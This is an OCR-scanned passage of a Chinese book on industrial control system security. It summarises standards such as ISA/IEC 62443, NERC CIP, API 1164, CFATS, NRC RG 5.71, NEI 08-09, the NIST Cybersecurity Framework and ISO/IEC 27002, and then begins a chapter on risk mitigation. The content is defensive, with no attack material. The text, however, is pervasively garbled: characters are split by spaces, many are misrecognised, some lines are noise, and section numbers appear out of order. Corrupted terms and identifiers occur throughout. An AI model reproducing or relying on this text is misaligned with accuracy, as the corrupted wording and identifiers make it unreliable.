平衡 监管 机 构 、 可 靠 性 协调 方 、 交 互 机 构 、 输 电 供 应 方 、 输 电 所 有 方 、 输 电 运 营 方 、 友 电站 所 有 方 、 发 电站 运营 方 以 及 负荷 服务 商 实 体 等 。 网 络 安全 标准 还 包括 
对 机 构 非 合 规 性 的 度量 与 评级 的 审计 ， 并 根据 其 违规 程度 进行 处 罚 。 


ISA-62443-1-1 ISA-TR62443-1-2 ISA-TR62443-1-3 ISA-TR62443-1-4 


技术 、 概 念 主要 术语 及 系统 信息 安全 IACS 信 息 安 全 
与 模型 缩写 词汇 表 合 规 性 度量 生命 周期 及 用 例 


ISA-62443-2-1 ISA-62443-2-2 ISA-62443-2-3 ISA-62443-2-4 


IACS 信 息 安全 IACS 人 信息 安 全 IACS 环 境 下 的 IACS 制 造 商 信息 
管理 系统 要 求 管理 实施 指南 补丁 管理 安全 与 维护 要 求 


ISA-62443-3-1 ISA-62443-3-2 ISA-62443-3-3 


De Ay HE A 系统 信息 安全 要 求 
安全 保障 等 级 与 信息 安全 保障 等 级 


ISA-62443-4-1 ISA-62443-4-2 


对 IACS 产 品 的 
信息 安全 技术 要 求 


th 
al 
ip 
= 
J 


系统 技术 


图 9-1 ISA/IEC62443 标 准 体 系 组 织 结构 


里 然 NERC CIP 安 全 标准 只 在 北美 主干 电力 系统 内 要 求 强制 执行 ， 但 是 这 些 标 准 在 技术 上 是 完备 的 ， 并 且 也 符合 其 他 工控 系统 安全 标准 。 电 力 设备 的 关键 基础 
设施 ， 尤 其 是 发 电 设备 、 发 电站 、 变 电站 用 到 的 集散 控制 系统 ， 以 及 电力 输送 用 到 的 控制 设备 都 采用 了 常见 的 工控 系统 资产 和 协议 ， 这 使 得 该 标准 对 于 越 来 越 多 
的 工控 系统 运营 商 而 言 具有 重要 的 现实 意义 。 


NERC 网 络 安全 系列 标准 主要 包括 : 

CIP-002， 网 络 安全 一 关键 网 络 资产 识别 
CIP-003， 网 络 安全 一 安全 管理 控制 

- CIP-004， 网 络 安全 一 人 员 与 培训 

- CIP-005， 网 络 安 全 一 电子 安全 范围 

- CIP-006， 网 络 安 全 一 关键 网 络 资产 物理 安全 
- CIP-007， 网 络 安 全 一 系统 安全 管理 

- CIP-008， 网 络 安 全 一 事件 报告 与 响应 计划 


- CIP-009， 网 络 安 全 一 关键 网 络 资 产 恢复 计划 


9.2.4 API1164 


美国 石油 协会 包括 了 石油 和 天 然 气 行业 中 各 个 领域 中 的 400 余 名 成 员 。API1164 标 准 从 完整 性 和 安全 性 两 方面 为 石油 和 天 然 气管 道 系 统 的 运营 商 实 施 SCADA 
系统 的 管理 提供 了 指导 。 该 标准 对 SCADA 安 全 方面 的 行业 实践 进行 了 描述 ， 并 概述 了 在 运营 商 各 自 所 在 的 机 构 内 部 制订 健全 的 安全 措施 时 所 需要 的 框 慷 。 
API1164 标 准 强 调 了 在 SCADA 系 统 进行 检查 以 对 系统 做 出 进一步 改进 时 ， 运 曹 商 们 深入 了 解 系统 漏洞 和 风险 的 重要 性 。API1164 标 准 通 过 以 下 几 条 措施 指导 并 提 
升 SCADA 系 统 操作 油气 管道 的 安全 性 : 


. 列 出 了 对 易 遭 受 攻击 事件 影响 的 SCADA 系 统 进行 识别 与 分 析 的 过 程 ; 
- 提供 了 对 核心 架构 进行 加 固 的 详细 列表 ; 


` 提供 了 行业 推荐 的 通行 实践 范例 。 


API1164 标 准 的 目标 受众 群 是 1T 安 全 资源 有 限 的 小 中 型 管道 运营 商 ， 并 且 适 用 于 大 多 数 SCADA 系 统 ， 而 不 仅仅 是 石油 与 天 然 气 领域 中 的 SCADA 系 统 。 文 档 的 
附录 包括 了 评估 SCADA 系 统 的 检查 清单 ， 以 及 对 SCADA 控 制 系 统 进 行 安全 规划 的 范例 。 


与 |SA62443 标 准 类 似 ，API1164 标 准 也 是 一 项 需要 购买 的 安全 标准 。 
9.2.2 CFATS 


CFATS 中 基于 风险 的 性 能 标准 (Risk-Based Performance Standards, RBPS) 概述 了 保障 化 工 设备 中 “网 络 ” (Cyber) 系统 和 数字 设备 安全 的 多 种 控制 
着 施 。 尤 其 是 ，RBPS 中 的 条 款 8“ 网 络 ” 从 以 下 方面 对 控制 措施 进行 了 介绍 : 


` 系统 开发 与 采购 
" 配置 管理 
审计 


下 列 化 工 设备 反 臣 怖 主义 标准 的 控制 措施 对 网 络 安全 尤为 重要 : 


` RTA (Metric) 8.2.1 要 求 使 用 边界 控制 措施 对 边界 予以 识别 与 保护 ， 边 界 控 制 措施 能 够 支持 基于 区 域 的 安全 模型 。 条 款 8.2 包 括 了 边界 防护 、 访 问 控制 和 


woe eH; 
RBI (ARZE) ”要 求 建立 特定 用 户 的 访问 控制 模型 ， 尤 其 要 考虑 到 职责 分 离 ， 并 强制 要 求 使 用 唯一 的 用 户 账户 、 访 问 控制 列表 和 其 他 防护 措施 ; 
“条款 8.5 ”涉及 资产 安全 监控 、 补 丁 管理 、 反 恶意 软件 、 网 络 行为 、 日 志 收集 与 报警 及 事件 响应 等 六 方面 的 特定 安全 措施 ; 
. 条 款 8.8 ”涉及 对 资产 与 配置 的 持续 性 架构 评估 ， 以 确保 安全 控制 措施 有 效 并 合 规 ; 


. 条 款 6.10 (潜在 危险 化 学 品 的 网 络 安 全 ) 、RBPS7 (蓄意 破坏 ) 、RBPS14 (特定 威胁 、 漏 洞 及 风险 ) 以 及 RBPS15 (报告 ) 包括 RBPS 条 款 8 中 建议 之 外 的 


网 络 安 全 控制 措施 ; 
-RBPS6.10 涉及 供应 链 的 安全 (也 就 是 说 ， 作 为 攻击 特定 目标 的 订购 与 物流 系统 同样 应 该 根据 RBPS 条 款 8.5 加 以 保护 ) ; 
-RBPS7 指出 如 果 破 坏 目 标 是 网 络 系统 的 话 ， 那 么 需要 有 采取“ 威慑、 检测、 延迟 及 响应 ”等 控制 措施 抵御 破坏 行动 ; 


- RBPS14 开展 有 效 的 安全 与 脆弱 性 评估 (Security and Vulnerability Assessment, SVA) 并 制订 风险 缓解 计划 ， 进 而 制订 出 特定 威胁 、 漏 洞 和 风险 的 应 对 措 


. RBPS15 明确 符合 规程 的 事件 通知 、 处 理 和 响应 要 求 。 
9.2.6 NRC Regulations5.71 


十 多 年 以 来 ， 核 能 管理 委员 会 (NRC) 一 直 试 图 解决 网 络 威胁 问题 、 帮 助 改 进 事 件 处 理 程序 并 对 核电 站 进行 监控 从 而 保护 天 键 数字 资产 。 最 开始 的 要 求 是 在 
2001 年 “911” 恐 怖 袭击 事件 后 下 令 强 制 实行 的 。 核 能 管理 委员 会 的 网 络 安全 规则 最 终于 2009 年 3 月 制订 完成 ， 涉 及 核 动力 反 应 扒 的 许可 证 持 有 人 和 新 反应 堆 的 许 
可 证 申请 人 。 规 则 中 的 内 容 还 包括 了 早期 命令 中 所 采取 的 措施 ， 以 及 在 实施 过 程 中 吸取 的 教训 。 


2010 年 1 月 ， 核 能 管理 委员 会 颁布 了 管理 导 则 RG5.71 (Regulatory Guide，RG) 。 该 管理 导 则 向 许可 证 持 有 人 和 许可 证 申请 人 提供 了 可 行 的 指导 ， 帮 助 他 们 
满足 网 络 安全 要 求 。 管 理 导 则 中 还 包括 了 多 个 机 构 在 实践 过 程 中 摸索 出 的 行业 “最 佳 实践 ”， 这 些 机 构 包括 国际 自动 化 协会 (1SA) 、 电 气 和 电子 工程 师 协会 
(IEEE) 、 美 国 国家 标准 与 技术 研究 院 (NIST) 以 及 美国 国土 安全 部 (DHS) 。 


RG5.71 明 确 了 一 个 框架 ， 用 以 识别 那些 必须 远离 网 络 攻击 的 数字 资产 。 这 些 识别 出 的 数字 资产 也 被 称 作 关键 数字 资产 (Critical Digital Assets, CDAs) 。 借 
助 管理 导 则 中 规定 的 防护 架构 及 安全 控制 措施 ， 许 可 证 持 有 人 应 该 对 关键 数字 资产 所 面临 的 潜在 网 络 安全 风险 加 以 处 理 。 


RG5.71 中 的 框架 能 够 帮助 许可 证 持 有 人 和 许可 证 申请 人 解决 现 有 系统 或 新 系统 中 的 特定 需求 。 管 理 导 则 的 目的 是 对 一 系列 众所周知 且 易 于 理解 的 安全 控制 措 
it 〈 基 于 美国 国家 标准 与 技术 研究 院 网 络 安全 标准 ) 进行 协调 。 这 些 安 全 措施 针对 关键 数 字 资 产 的 潜在 网 络 风险 提供 了 一 套 灵活 且 有 计划 性 的 方式 ， 以 便 许可 证 
持 有 人 和 许可 证 申请 人 制订 安全 控制 措施 并 加 以 维护 ， 最 后 可 以 成 功 地 将 这 些 安全 控制 措施 整合 进 针 对 某 一 场 站 的 网 络 安全 规划 当中 。 


使 用 附录 A 中 提出 的 通用 安全 规划 模板 ， 管 理 导 则 RG5.71 的 组 织 架构 反映 了 为 满足 美国 联邦 法 规 10CFR73.54 的 要 求 所 必需 的 步 又。 尤其 是 ， 管 理 导 则 中 的 
C.1 节 为 “通用 要 求 ”， 概 述 了 网 络 安全 方面 的 相关 管理 要 求 。C.2 节 为 “网 络 安全 规划 要 素 ”， 介绍 了 网 络 安全 规划 的 要 素 ， 并 提出 了 对 符合 10CFR73.54 条 款 的 
网 络 安全 规划 的 验收 方法 。 

C.3 节 为 “网 络 安全 计划 的 制订 与 实施 ”， 详 细 地 阐述 了 一 种 识别 关键 数字 资产 的 可 行 方法 ， 解 决 了 关键 数字 资产 的 潜在 网 络 安全 风险 ， 并 实现 了 对 
SSEPI4 功 能 进行 保护 的 防护 策略 。 关 键 数字 资产 的 区 分 与 保护 在 纵深 防御 策略 中 至 关 重要 。 正 如 前 文中 所 讨论 的 ，RG5.71 按 照 NIST SP800-53 和 800-82 的 建 
议 ， 提 出 了 一 系列 安全 控制 措施 以 应 对 关键 数字 资产 的 潜在 网 络 风 险 。 尤 其 是 ，NI1ST 标 准 的 建议 包含 了 18 组 100 余 条 安全 控制 措施 。 这 18 组 安全 控制 措施 被 进 一 
步 划分 为 三 类 ， 即 技术 类 、 运 营 类 和 管理 类 。C.3 节 还 给 出 了 实现 安全 控制 措施 的 可 行 方法 ， 详 见 该 导 则 附录 B 与 附录 C。 

对 于 网 络 安全 计划 实施 过 程 中 的 监管 要 求 ，C.3 节 亦 就 有 关 策 略 与 程序 提出 了 指导 建议 。 策 略 和 程序 是 安全 控制 过 程 中 必 不 可 少 的 部 分 ， 成 功 的 安全 管理 规划 
离 不 开 策 略 和 程序 的 完善 制订 。 

C.4 节 为 “网 络 安全 计划 维护 ”， 基 于 C.3 节 的 指导 建议 讨论 了 网 络 安全 计划 维护 过 程 中 的 需求 ， 即 需要 对 关键 数字 资产 进行 全 面 监 控 以 保证 其 安全 保护 措施 
的 有 效 性 。 网 络 安全 计划 必须 确保 关键 数字 资产 或 是 环境 上 的 任何 变动 都 是 在 受 控 状态 下 协调 开展 的 ， 还 需要 对 其 进行 定期 审查 ， 从 而 提供 持续 保护 使 其 免 遭 网 
络 攻 击 。C.4 节 也 再 一 次 提出 了 定期 进行 计划 审查 的 要 求 。 最 后 ，C.5 节 为 “记录 保存 与 处 理 ”， 为 许可 证 持 有 人 和 许可 证 申请 人 提供 了 保存 其 网 络 安全 计划 相关 
记录 的 指南 。 

RG5.71 的 附录 A 提供 了 通用 网 络 安 全 规划 模板 ， 许 可 证 持 有 人 和 许可 证 申请 人 可 以 使 用 这 些 模板 满足 10CFR73.54 中 的 许可 要 求 。 附 录 B 和 附录 C 提 供 了 一 系 
列 可 行 的 安全 控制 措施 ， 这 些 措施 由 NIST 网 络 安全 标准 和 安全 控制 发 展 而 来 ， 针 对 易于 理解 的 威胁 、 漏 洞 和 攻击 给 出 了 同样 易于 理解 且 经 过 审查 的 对 抗 措 施 和 保 
护 技 术 。 


在 美国 联邦 法 规 第 10 卷 第 73 章 《工厂 及 原材料 的 物理 保护 》 的 第 73.54 节 “数字 计算 机 和 通信 系统 及 网 络 的 保护 ”中 要 求 ， 许 可 证 持 有 人 必须 严格 确保 对 数字 
计算 机 、 通 信 系 统 及 网 络 进行 了 妥善 保护 以 抵抗 网 络 攻击 ， 包 括 但 不 限于 10CFR73 中 第 73.1 节 中 所 摘 述 的 设计 基 / 侍 威胁 。 


按照 要 求 ， 许 可 证 持 有 人 需要 保护 具备 以 下 功能 的 数字 计算 机 、 通 信 系 统 及 网 络 ， 以 应 对 诸如 修改 、 破 坏 或 入 侵 数 据 和 (或 ) 软件 的 完整 性 或 机 密 性 ， 拒 绝 
访问 系统 、 服 务 和 (或 ) 数据 ， 影 响 系 统 、 网 络 及 相关 设备 运行 等 方面 的 网 络 攻击 : 


:与 功能 安全 相关 以 及 对 功能 安全 非常 重要 的 功能 ; 


.应急 准备 功能 ， 包 括 离 站 通信 


` 在 遭受 入 侵 的 情况 下 ， 将 对 功能 安全 、 信 息 安 全 或 应 急 准 备 功能 造成 不 利 影 响 的 支持 系统 与 设备 。 


9.2./ NEI08-09 


美国 核能 研究 院 NE108-09 标 准 主要 描述 了 由 一 套 防 护 架 构 和 一 组 安全 控制 措施 组 成 的 防护 策略 。 其 中 安全 控制 措施 依据 于 NIST SP800-82《 工 业 控制 系统 安 
全 指南 》 在 2008 年 9 月 发 布 的 最 终 公 开 草 案 ， 以 及 NIST SP800-53《 联 邦 信息 系统 安全 控制 建议 》 (第 2 版 ) 标 准 而 制 J。 按 照 NIST SP800-82 和 NIST SP800-53 
中 的 要 求 与 建议 ，NE108-09 附 录 D 和 附录 E 中 的 安全 控制 措施 专门 为 核 设施 而 量 身 打造 。 


NEI08-09 的 第 6 版 ， 包 括 了 以 下 内 容 : 


. 附录 A 一 网 络 安全 规划 模板 “许可 证 持 有 人 在 制订 网 络 安全 规划 时 应 该 使 用 该 模板 ， 并 且 依 据 10CFR73.54 要 求 必须 将 规划 提交 至 NRC。 附 录 A 模 板 避 中 的 方 
括号 内 的 信息 必须 根据 许可 证 持 有 人 的 具体 信息 进行 修改 然后 删除 括号 。 其 他 特定 于 某 许 可 证 持 有 人 的 信息 还 包括 防护 策略 。 


附录 D 一 技术 类 安全 控制 措施 “技术 类 控制 措施 是 保障 系统 可 用 性 、 完 整 性 和 机 密 性 的 手段 。 这 些 手段 主要 针对 未 授权 的 访问 、 使 用 、 中 断 、 修 改 或 者 破 
坏 等 操作 实施 对 关键 数字 资产 和 (或 ) 其 功能 的 保护 。 系 统 级 的 控制 措施 通常 单独 使 用 ， 或 者 与 其 他 手段 、 方 法 或 者 技术 相 结合 ， 从 而 提供 针对 已 识别 风险 的 保 
护 屏障 。 技 术 类 控制 措施 需要 按照 要 求 进行 测试 、 有 效 性 评估 、 监 控 、 替 斤 或 者 补充 ， 以 确保 其 具备 相应 的 安全 级 别 来 缓解 已 识别 出 的 风险 。 


- 附录 E 一 管理 及 运营 控制 措施 ”通过 将 增强 网 络 安全 水 平 的 活动 包含 在 防护 策略 之 中 来 实施 管理 及 运营 方面 的 网 络 安 全 控制 ; 并 且 制 订 相 关 的 程序 和 过 程 ， 
例如 工程 生命 周期 活动 管理 、 工 程 采购 流程 和 软件 质量 保障 (Software Quality Assurance) 计划 等 ;还 要 确保 采购 合同 中 明确 了 网 络 安全 需求 。 


[1] overlays 即 提供 一 组 安全 控制 措施 ， 是 针对 某 一 特定 需求 、 技 术 、 任 务 及 操作 环境 在 机 构 范 围 内 对 控制 措施 的 加 强 以 及 指南 的 补充 。 一 译 者 注 


[2] 即 safety ，secutity and emergency ptepatedhness， 功 能 安全 、 信 息 安 全 与 应 急 准 备 。 一 译 者 注 


[3] 在 附录 A 提供 的 模板 中 ,会 有 部 分 内 容 由 许可 证 持 有 人 根据 实际 情况 进行 填写 ， 如 [Site/Licensee]、[site(s)]、[policy/procedure] 等 信息 。 一 译 者 注 


9.3 ”通用 网 络 安全 标准 


本 节 对 通用 网 络 安全 标准 进行 了 概述 ， 虽 然 这 些 通用 网 络 安 全 标准 并 不 专门 针对 工控 系统 ， 但 是 经 常会 在 制订 工控 系统 网 络 安 全 标准 、 策 略 和 计划 时 予以 参 
考 。 


9.3.1 ”NIST 网 络 安全 框架 


虽然 NIST 网 络 安全 框架 并 非 专 门 针对 工控 系统 ， 但 由 于 框 染 中 的 网 络 安全 标准 已 经 整合 进 框架 的 核心 结构 (包括 ISA62443 标 准 ) ， 因 此 工业 组 织 实际 上 已 经 
开始 采用 该 框架 了 ， 只 不 过 采用 了 其 中 的 一 部 分 或 将 其 作为 基线 标准 使 用 。 


在 意识 到 美国 的 国家 安全 和 经 济 安全 依赖 于 其 天 键 基础 设施 的 可 靠 运转 之 后 ， 前 美国 总 统 奥巴马 总 统 于 2013 年 2 月 签署 了 第 13636 号 总 统 令 《 提 高 关键 基础 设 
施 的 网 络 安全 》。 该 项 命令 指导 NIST 协 同 各 利益 相关 方 基于 现行 标准 、 指 南 和 实践 共同 开发 一 套 上 自愿 框架 ， 以 减少 关键 基础 设施 所 面临 的 网 络 空间 风险 。 


NIST 于 2014 年 2 月 12 日 故 布 了 第 1 版 《提高 关键 基础 设施 的 网 络 安全 》 框 架 。 该 框架 由 行业 组 织 和 政府 机 构 共 同 协 作 构 建 而 成 ， 包 括 一 系列 标准 、 指 南 和 实践 
以 促进 对 关键 基础 设施 的 保护 。 框 架 中 的 方法 具有 较 高 的 优先 级 、 实 现 灵活 和 可 重复 性 ， 并 且 成 本 效益 也 比较 高 ， 从 而 能 够 帮助 天 键 基础 设施 的 所 有 方 和 运营 方 
来 管理 网 络 安 全 相关 的 风险 。 


美国 国土 安全 部 提出 的 关键 基础 设施 网 络 社区 C3 志愿 计划 (Critical Infrastructure Cyber Community C3Voluntary Program) 也 旨 在 帮助 关键 基础 设施 
所 有 方 和 运营 方 同 现 有 的 资源 相互 配合 协作 ， 这 些 资 源 将 协助 他 们 应 用 网 络 安全 框架 并 管理 其 网 络 风险 。 


但 该 框架 并 不 是 管理 关键 基础 设施 网 络 安全 风险 的 “万 金 油 ”。 机 构 仍然 会 面临 着 其 特有 的 风险 ， 因 为 威胁 不 同 、 漏 洞 不 同 、 对 风险 的 容忍 程度 也 不 同 ， 所 
以 他 们 各 自如 何 实现 框架 内 的 做 法 也 不 一 致 。 机 构 能 够 确定 对 于 提供 关键 服务 来 这 更 为 重要 的 活动 ， 并 且 可 以 将 投资 进行 优先 级 上 的 区 分 以 求 将 每 一 分 钱 都 化 在 
刀 丸 上。 最后， 该 框 以 的 目的 在 于 减少 网 络 安全 风险 ， 并 对 网 络 安全 风险 实施 更 好 的 管理 。 同 时 ， 该 框 以 也 是 动态 的 ， 行 业 用 户 不 断 将 实现 中 的 问题 予以 反馈 ， 
因此 可 以 对 框架 进行 持续 更 新 和 改进 。 在 该 框架 投入 实际 应 用 的 过 程 中 ， 汲 取 的 教训 也 会 被 整合 进 新 的 版 本 中 ， 确 保 该 框架 满足 关键 基础 设施 所 有 方 和 运营 方 的 
动态 需求 ， 以 在 充满 挑战 的 现实 环境 中 应 对 新 威胁 、 新 风险 以 及 新 的 攻击 方法 。 


NIST 网 络 安 全 框架 应 用 基于 风险 的 方法 对 网 络 安全 风险 进行 管理 。 它 由 三 部 分 组 成 : 框 染 核心 、 框 架 实施 层 和 框架 轮廓 。 每 一 部 分 都 加 强 了 业务 驱动 和 网 络 
安全 活动 的 联系 。 对 上 述 部 分 解释 说明 如 下 : 


. 框架 核心 “框架 内 核 由 在 关键 基础 设施 各 个 区 域 常见 的 一 组 网 络 安全 活动 、 预 期 效果 和 适用 的 参照 标准 文件 组 成 。 框 架 核心 以 一 种 允许 从 执行 层 到 实施 层 

全 活动 和 预期 效果 进行 跨 机 构 的 沟通 与 交流 的 方式 ， 提 供 了 行业 标准 、 指 南 和 最 佳 实践 。 框 架 核心 由 五 个 并 行 、 连 续 的 功能 组 成 : 识别 、 保 
护 、 检 测 、 响 应 和 恢复 。 当 这 五 个 去 合 在 一 起 时 ， 能 够 提供 一 个 贯穿 机 构 网 络 安全 风险 管理 生命 周期 的 顶层 战略 视角 。 框 架 核心 还 针对 每 一 个 功能 识别 出 其 
类 和 子 分 3 


潜在 的 关键 分 类 和 子 分 类 ， 将 它们 与 每 个 子 分 类 中 参考 信息 实例 相 匹 配 ， 比 如 现 有 的 标准 、 指 南 和 实践 。 


过 
zh 
CE 
\ 


框架 实施 层 (“层级 ”) ”为 各 机 构 提 供 了 看 待 网 络 安全 风险 和 管理 风险 过 程 的 指导 。 这 一 层 描述 了 机 构 网 络 风 险 管理 实践 对 框架 中 所 定义 特征 不 同 程 度 
的 展示 (如 风险 和 威胁 感知 、 可 重复 性 、 及 自 适应 性 等 特征 ) 。 该 层 将 机 构 的 管理 实践 分 为 四 个 层次 ， 从 部 分 实施 级 (第 1 层级 ) 到 自 适 应 级 (第 4 层级 ) 。 这 些 
层级 反映 了 由 非 正 式 、 被 动 的 响应 到 采用 灵活 的 、 风 险 告 知 的 方法 的 推进 过 程 。 在 层级 选择 的 过 程 中 ， 机 构 应 该 考虑 到 其 当前 风险 管理 实践 、 威 胁 环境 、 法 律 和 
制度 的 遵从 性 要 求 、 业 务 或 任务 目标 ， 以 及 组 织 上 的 约束 。 


- 框架 轮廓 ( “轮廓 ”) 阐述 了 机 构 基 于 业务 需求 从 框架 分 类 和 子 分 类 中 选择 控制 措施 后 的 结果 。 在 特定 的 实施 场景 中 ， 轮 廓 需要 与 框架 核心 执行 的 标 
准 、 指 南 和 实践 相 一 致 。 通 过 对 比 “当前 ” 轮 廊 (Current Profile， 即 当前 所 处 的 状态 ) 和 “目标 ”轮廓 (Target Profile， 即 希望 处 于 的 状态 ) ， 可 以 明确 需 改 进 的 
网 络 安 全 态势 要 素 。 在 制订 轮 廊 时 ， 机 构 可 以 基于 业务 需求 和 风险 评估 ， 对 所 有 的 类 别 和 子 类 别 进行 审查 ， 并 确定 哪些 是 最 重要 的 ; 还 可 以 视 情 增加 解决 风险 所 
需 的 类 别 和 子 类 别 。 当 考虑 到 其 他 业务 需求 ， 包 括 成 本 效益 和 创新 性 时 ， 当 前 轮 廊 可 用 于 衡量 同 目标 轮廓 相 比 改 进 的 优先 级 和 进展 情况 。 此 外 轮廓 还 可 以 用 于 开 
展 自我 评估 以 及 机 构 内 部 或 机 构 之 间 的 交流 。 


9.3.2 ISO/IEC27002: 2013 标 准 


ISO/IEC27002: 2013 标 准 是 由 国际 标准 化 组 织 (ISO) 、 国 际 电工 委员 会 (IEC) 和 美国 国家 标准 研究 院 (American National Standards 
Institute, ANSI) 颁布 的 ISO/IEC27000 国 际 标准 族 中 的 一 项 标准 。 图 9-2 说 明了 ISO27000 标 准 族 的 组 织 结 构 。 标 准 族 中 的 第 一 项 标准 : 1SO27001， 根 据 普 遍 认 
可 的 风险 管理 技术 制订 了 信息 安全 管理 体系 (Information Security Management System, ISMS) 。1SO27002， 其 前 身 为 ISO17799， 后 更 名 为 ISO27002， 
对 数 十 种 潜在 的 安全 控制 措施 进行 了 概述 ， 这 些 措施 可 用 来 应 对 使 用 |SO27001 标 准 中 的 技术 识别 出 的 风险 。 虽 然 ISO/IEC27002 标 准 在 对 工业 自动 化 和 控制 领域 
的 针对 性 保护 上 指导 不 多 ， 但 是 该 标准 仍然 经 常 被 工控 系统 网 络 安全 策略 和 标准 所 参考 ， 因 为 该 标准 同 很 多 国家 的 网 络 安全 标准 存在 对 应 天 系 ， 例 如 澳大利亚 、 
新 西 兰 、 巴 西 、 和 智利、 捷克 、 上 丹麦、 爱沙尼亚 、 日 本 、 了 了 立陶宛、 荷兰、 波兰、 秘鲁、 南非 、 西 班 牙 、 瑞 典 、 土 耳 其 、 英 国 、 匈 牙 利 、 俄 罗斯 和 中 国 。 


与 NERC CIP 和 CFATS 标 准 类 似 ， 除 了 纯粹 的 技术 类 安全 控制 措施 之 外 ，1SO/AIEC27002 标 准 还 关注 于 风险 评估 和 安全 政策 。 在 其 2013 年 版 中 对 114 种 安全 控 
制 措施 进行 了 讨论 ， 包 括 资产 管理 和 配置 管理 控制 、 网 络 通信 中 的 隔离 和 安全 控制 、 访 问 控制 中 的 特定 主机 安全 控制 以 及 反 病 毒 保护 。 其 中 最 值得 一 提 的 是 围绕 
安全 事件 管理 的 一 组 控制 措施 ， 这 组 措施 可 通过 异常 检测 专门 丈 安 全 违规 行为 进行 预警 。 


94 ”本章 忆 结 


了 解 安全 标准 和 法 规 如 何 保障 工控 系统 的 网 络 安全 ， 对 于 制订 整体 安全 策略 至 关 重 要 。 但 是 ， 这 些 标准 和 法 规 只 应 该 作为 最 基本 的 安全 基线 。 事 实 上 ， 有 大 
量 的 安全 标准 可 供 选 择 ， 有 针对 特定 行业 的 ， 有 适用 于 所 有 工控 系统 环境 的 ， 还 有 虽然 并 非 专 门 针对 工控 系统 但 却 与 工控 系统 息息相关 的 。 本 章 对 最 常用 的 一 些 
安全 标准 进行 了 概述 ， 既 有 专门 针对 工控 系统 的 标准 ， 也 有 非 专 门 针 对 工控 系统 的 标准 。 当 制订 自己 的 工控 系统 网 络 安全 计划 时 ， 如 果 需 要 考虑 和 参考 安全 标 
准 ， 那 么 这 些 资 料 都 可 以 作为 非常 宝贵 的 资源 。 


信息 安全 管理 体系 综述 与 术语 


ISMS 要 求 ISMS 认 证 机 构 要 求 


信息 安全 常理 操作 实践 规则 


ISMS 实 施 指 南 27001 与 200001-1 的 整合 实施 


27004 


ISM 度 量 信息 安全 治理 


ri AEE AE IA or E E ISM 的 组 织 经 济 学 


| 27009 (EFH ) 
ISMS 审 核 指 南 针对 特定 行业 或 服务 
认可 的 第 三 方 认证 中 
的 使 用 和 应 用 


| | | H tH Ee | 


Lo Li se 


: 部 门 则 与 机 构 间 通信 的 信息 安全 管理 
电信 行业 的 信息 安全 管理 


: (技术 报告 ) 金融 和 了 业 的 信息 安全 管理 
: 能 源 公 用 事业 过 程控 制 系统 的 系统 信息 安全 管理 
: 医疗 卫生 行业 的 信息 安全 省 理 


行业 标准 


27017: 云 计 算 系 统 信 息 安 全 控制 
27018: 公共 云 个 人 识别 信息 保护 


规范 标准 ( 要 求 ) 信息 标准 (JSF ) 


图 9-2 ISO27000 系 列 标准 


9.5 ”延伸 阅读 


。 National Institute of Standards and Technology (NIST) Special Publication 800-82 
(http://csre.nist.gov/publications/nistpubs/800-82/SP800-82-final.pdf) 

。 International Society of Automation (ISA)/IEC 62443 (https://www.isa.org/templates/ 
two-column.aspx?pageid=121797) 


e North American Electric Reliability Corporation Critical Infrastructure Protection 
(NERC CIP) Reliability Standards (http://www.nerc.com/pa/Stand/Pages/ 
CIPStandards.aspx) 


e American Petroleum Institute (API) 1164, “Pipeline SCADA Security” (https:// 
global.ihs.com/doc_detail.cfm?document_name=API%20STD%201164) 


e U.S. Department of Homeland Security (DHS) Chemical Facility Anti-Terrorism 
Standards (CFATS) (https://www.dhs.gov/chemical-facility-anti-terrorism-standards) 


e U.S. Nuclear Regulatory Commission (NRC) (http://www.nrc.gov/) 


e Nuclear Energy Institute (NEI) 08-09 (http://www.nrc.gov/docs/ML1011/ 
ML101180437.pdf) 

e National Institute of Standards and Technology (NIST) Cybersecurity Framework 
(http://www.nist.gov/cyberframework/ ) 


e National Institute of Standards and Technology (NIST) Special Publication 800-53 
(http://www.nist.gov/manuscript-publication-search.cfm?pub_id=915447) 


e ISO/IEC 27001 and 27002 (http://www.27000.org/) 


e Publications of the European Union Agency for Network and Information Security 
(ENISA) (https://www.enisa.europa.eu/publications) 


SRIOE DVSX RS 


IFMIAB A} Bes, RAGS BMit SRM EH EA MAR SHAE AaB AY, AREER INA, PLA ert ONS 
显 ， 渗 透 测 试 的 价值 才能 够 充分 体现 出 来 。 这 其 实 就 是 开展 渗透 测试 的 投资 回报 (RO!) 。 没 有 哪个 机 构 能 拥有 无 限 的 资源 ， 因 此 防护 措施 也 必须 在 考虑 防护 的 有 
效 性 与 高 效 程度 以 及 成 本 的 情况 下 进行 优先 级 排序 。 


许多 人 分 不 清 修 复 (remediation) 和 缓解 (mitigation) 的 含义 ， 而 且 经 常 把 它们 替换 混用 。 但 这 两 个 词 的 意思 并 不 完全 相同 。 在 网 络 安全 的 领域 里 ， 修 复 意 味 
着 修补 或 者 纠正 菜 个 问题 ， 比 如 修复 某 个 漏洞 。 而 缓解 则 意味 着 降低 影响 或 者 减少 菜 件 事 发 生 的 可 能 性 。 要 么 修复 漏洞 ， 要 么 缓解 风险 和 威胁 。 从 整体 上 来 看 ， 


缓解 更 宏观 一 些 ， 而 修复 只 是 缓解 风险 的 若干 手段 之 一 〈 也 就 是 说 ， 可 以 通过 修复 漏洞 来 缓解 风险 ) 。 


本 章 中 通过 讨论 机 构 如 何 针 对 本 书 中 所 涉及 的 工控 系统 网 络 攻击 、 应 用 程序 攻击 和 设备 攻击 来 制订 防御 和 (或 ) 风险 缓解 策略 ， 我 们 终于 可 以 将 完整 的 风险 
评估 过 程 形 成 一 个 闭环 了 。 正 如 本 书 中 不 断 提 到 以 及 本 章 结尾 “延伸 阅读 ”中 所 涉及 的 内 容 ， 从 防御 或 者 “ 蔓 队 ”的 角度 来 说 ， 已 经 出 版 了 许多 关于 工控 系统 安 
全 的 经 典 书籍 。 因 此 ， 本 章 着 重 研究 工控 系统 特有 的 风险 绥 解 策略 和 相关 对 抗 措施 ， 尤 其 是 同 本 书 中 的 漏洞 与 攻击 实例 息息相关 的 策略 和 措施 。 


10.1 风险 处 置 


之 前 ， 我 们 从 总 体 上 和 概念 上 将 风险 定义 为 : 
由 于 目标 对 象 中 所 存在 的 潜在 脆弱 性 ， 威 胁 源 通过 威胁 向 量 导 致 威胁 事件 发 生 的 可 能 性 ， 以 及 由 此 而 产生 的 后 果 和 影响 。 


第 2 章 和 第 3 章 通 过 风险 评估 、 威 胁 建 模 和 风险 场景 对 信息 进行 收集 并 对 其 优先 级 进行 排序 从 而 为 防护 策略 的 制订 提供 了 素材 。 这 些 信息 通过 渗透 测试 进一步 
